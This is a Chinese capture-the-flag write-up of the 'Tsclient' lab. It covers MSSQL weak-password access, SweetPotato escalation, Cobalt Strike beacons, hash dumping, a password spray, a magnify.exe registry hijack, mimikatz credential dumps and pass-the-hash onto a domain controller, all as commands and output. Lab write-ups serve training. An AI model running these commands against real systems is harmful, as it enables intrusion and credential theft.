春秋云境-Tsclient

内网攻防 
1
fscan.exe -h 39.98.115.156 -p 1-65535

扫出来个弱口令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.98.115.156:110 open
39.98.115.156:25 open
39.98.115.156:80 open
39.98.115.156:1433 open
39.98.115.156:2383 open
39.98.115.156:3389 open
39.98.115.156:16450 open
39.98.115.156:16452 open
39.98.115.156:16451 open
39.98.115.156:16453 open
39.98.115.156:17001 open
39.98.115.156:47001 open
39.98.115.156:49665 open
39.98.115.156:49664 open
39.98.115.156:49666 open
39.98.115.156:49668 open
39.98.115.156:49669 open
39.98.115.156:49683 open
39.98.115.156:49705 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle http://39.98.115.156:47001 code:404 len:315    title:Not Found
[*] WebTitle http://39.98.115.156      code:200 len:703    title:IIS Windows Server
[+] mssql 39.98.115.156:1433:sa 1qaz!QAZ
已完成 18/19 [-] (57/210) rdp 39.98.115.156:3389 administrator Aa123123 remote error: tls: access denied

数据库提权

数据库直接上MDUT

权限有点低,上甜土豆

读一下admin目录下,发现flag

1
C:/Users/Public/SweetPotato-Webshell-new.exe -a "type C:\Users\Administrator\flag\flag01.txt"

内网渗透

传个cs🐎

1
C:/Users/Public/SweetPotato-Webshell-new.exe -a "C:/Users/Public/beacon.exe"

传个fscan扫一下

1
shell C:/Users/Public/fscan.exe -h 172.22.8.0/24
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.3
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.46     is alive
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.31     is alive
(icmp) Target 172.22.8.18     is alive
[*] Icmp alive hosts len is: 4
172.22.8.15:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:1433 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:88 open
Open result.txt error, open result.txt: Access is denied.
[*] alive ports len is: 16
start vulscan
[*] NetInfo 
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01           
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT         
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:188a:17bd:d89d:8c63
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
Open result.txt error, open result.txt: Access is denied.

收集用户信息

1
shell net user

此时是system起的🐎所以直接dump下来hash就行,直接会话框交互hashdump

1
2
3
4
5
6
7
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::

看看john在不在线

1
shell quser || qwinst

看到john在线,尝试注入进程上线,

看一下网络

1
shell net use

读取一下共享文件

1
shell dir \\TSCLIENT\C

1
shell type \\tsclient\c\credential.txt

1
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

提示映像劫持,起个代理,kali密码喷洒一下

1
proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

登陆的话会过期,这边kalirdp登陆改密码和利用impacket改都可以

1
impacket-smbpasswd xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Calmsec1!'
1
proxychains rdesktop 172.22.8.46

1
2
3
172.22.8.15 rdp不上
172.22.8.31 登不了
172.22.8.46 成功登录

利用第一台win转发上线一下

再用这个监听器,生成个马

把生成的🐎传到8.46上去

运行一下

映像劫持

映像劫持提权,先查看权限:

1
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

这里我们发现所有正常登录的用户都可以修改注册表,利用这个性质,修改注册表映像劫持,使用放大镜进行提权,其实也就是把本来用户主页点放大镜启动的magnify.exe替换成C:\windows\system32\cmd.exe,这样就直接提权成system了

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

接着锁定

点一下放大镜

拿到system

此时再运行上传的马,拿到system的🐎

1
shell type C:\Users\Administrator\flag\flag02.txt

拿到第二个flag

1
logonpasswords
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN2016$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/8 23:26:49
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 40af44e61e8174dfa92f90a696be81e8
	 * SHA1     : 378b412b2e447892d8b92acde54467d5b41f3a3c
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : XIAORANG.LAB
	 * Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29 
	ssp :	
	credman :	

Authentication Id : 0 ; 851871 (00000000:000cff9f)
Session           : RemoteInteractive from 2
User Name         : Aldrich
Domain            : XIAORANG
Logon Server      : DC01
Logon Time        : 2025/3/8 23:33:01
SID               : S-1-5-21-3289074908-3315245560-3429321632-1105
	msv :	
	 [00000003] Primary
	 * Username : Aldrich
	 * Domain   : XIAORANG
	 * NTLM     : effdad263995efa4a11f6bc121ef623a
	 * SHA1     : 6691986c4240cf9025618b8c34639c226891b86e
	 * DPAPI    : 5e4bb4bd0e5ffefa26f4c78b6df8c2a2
	tspkg :	
	wdigest :	
	 * Username : Aldrich
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : Aldrich
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 829666 (00000000:000ca8e2)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/8 23:33:01
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
	 * SHA1     : e06238ecefc14d675f762b08a456770dc000f763
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 9e ae c4 7a ed ee 91 74 a5 59 61 a5 00 2c c5 00 60 3b 87 48 d0 17 48 cf df 7b 14 af 9a 99 22 b5 94 ba 0a 1e f0 6e f0 25 b1 e2 a2 62 fb b8 68 93 42 64 08 b7 f6 2e f7 cf ae a3 7a 94 9d 32 24 1a b1 6b 87 6c 5e f1 d3 89 c6 c4 8b d3 bd 05 9c b0 e1 85 d4 2c 03 56 5f af 09 15 12 10 df 74 e7 4c d3 65 55 d8 ab bd b4 71 5c 8c a7 bd 14 60 8b 44 b5 d8 d8 61 23 f1 4f 4d 8e a0 dc ac 8a 60 15 0d f7 9f a1 85 98 c4 cf 34 ec ee ea c5 b9 5b 42 8b 97 cc 4d ed 1f db 8c b4 45 06 ce 40 fc 81 96 ac c3 61 e5 e9 42 90 69 f3 b2 85 fa 80 59 e2 8b a5 f6 70 5d 1a bd 5f b1 85 6b ae b0 16 42 29 2c 99 57 fb 49 ea e3 29 49 56 55 6c 9a 2b ee 13 77 fe d7 a3 51 b8 01 ec bb 60 22 b8 7c 2f f5 6b 0f 6b 87 36 76 45 81 7e e3 71 0a a8 ca 2a a3 a6 05 64 
	ssp :	
	credman :	

Authentication Id : 0 ; 828954 (00000000:000ca61a)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/8 23:33:01
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 40af44e61e8174dfa92f90a696be81e8
	 * SHA1     : 378b412b2e447892d8b92acde54467d5b41f3a3c
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29 
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/8 23:26:53
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/8 23:26:50
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 54890 (00000000:0000d66a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/8 23:26:50
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
	 * SHA1     : e06238ecefc14d675f762b08a456770dc000f763
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 9e ae c4 7a ed ee 91 74 a5 59 61 a5 00 2c c5 00 60 3b 87 48 d0 17 48 cf df 7b 14 af 9a 99 22 b5 94 ba 0a 1e f0 6e f0 25 b1 e2 a2 62 fb b8 68 93 42 64 08 b7 f6 2e f7 cf ae a3 7a 94 9d 32 24 1a b1 6b 87 6c 5e f1 d3 89 c6 c4 8b d3 bd 05 9c b0 e1 85 d4 2c 03 56 5f af 09 15 12 10 df 74 e7 4c d3 65 55 d8 ab bd b4 71 5c 8c a7 bd 14 60 8b 44 b5 d8 d8 61 23 f1 4f 4d 8e a0 dc ac 8a 60 15 0d f7 9f a1 85 98 c4 cf 34 ec ee ea c5 b9 5b 42 8b 97 cc 4d ed 1f db 8c b4 45 06 ce 40 fc 81 96 ac c3 61 e5 e9 42 90 69 f3 b2 85 fa 80 59 e2 8b a5 f6 70 5d 1a bd 5f b1 85 6b ae b0 16 42 29 2c 99 57 fb 49 ea e3 29 49 56 55 6c 9a 2b ee 13 77 fe d7 a3 51 b8 01 ec bb 60 22 b8 7c 2f f5 6b 0f 6b 87 36 76 45 81 7e e3 71 0a a8 ca 2a a3 a6 05 64 
	ssp :	
	credman :	

Authentication Id : 0 ; 54870 (00000000:0000d656)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/8 23:26:50
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 40af44e61e8174dfa92f90a696be81e8
	 * SHA1     : 378b412b2e447892d8b92acde54467d5b41f3a3c
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29 
	ssp :	
	credman :	

Authentication Id : 0 ; 25098 (00000000:0000620a)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/8 23:26:49
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 40af44e61e8174dfa92f90a696be81e8
	 * SHA1     : 378b412b2e447892d8b92acde54467d5b41f3a3c
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN2016$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/8 23:26:49
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : XIAORANG.LAB
	 * Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29 
	ssp :	
	credman :	

1
shell net user /domain
1
2
3
4
5
6
7
8
9
这项请求将在域 xiaorang.lab 的域控制器处理。


\\DC01.xiaorang.lab 的用户帐户

-------------------------------------------------------------------------------
Administrator            Aldrich                  Guest                    
krbtgt                   
命令运行完毕,但发生一个或多个错误
1
shell net group "domain admins" /domain
1
2
3
4
5
6
7
8
9
10
这项请求将在域 xiaorang.lab 的域控制器处理。

组名     Domain Admins
注释     指定的域管理员

成员

-------------------------------------------------------------------------------
Administrator            WIN2016$                 
命令成功完成。

发现win2016在域管里,dump一下hash直接打pth即可

1
proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 40af44e61e8174dfa92f90a696be81e8 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"